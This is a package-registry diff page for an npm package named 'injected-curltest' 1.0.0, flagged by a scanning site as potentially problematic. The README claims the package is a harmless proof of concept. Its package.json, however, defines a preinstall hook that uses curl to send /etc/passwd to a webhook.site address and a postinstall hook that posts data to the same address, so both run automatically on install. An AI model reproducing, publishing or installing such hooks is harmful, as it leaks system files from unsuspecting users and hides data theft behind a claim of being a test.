injected-curltest 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of injected-curltest might be problematic. Click here for more details.
- package/README.md +1 -0
- package/package.json +13 -0
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
This package is a proof of concept. It has been uploaded for test purposes only. The code is not malicious in any way and will be deleted as soon as test will be completed.",
|
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "injected-curltest",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "This package is a proof of concept. It has been uploaded for test purposes only. The code is not malicious in any way and will be deleted as soon as test will be completed",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"postinstall": "curl -X POST --data-binary @- https://webhook.site/d1e93167-998d-409e-b0b3-2d81d5995eb2",
|
9
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' https://webhook.site/d1e93167-998d-409e-b0b3-2d81d5995eb2"
|
10
|
+
},
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|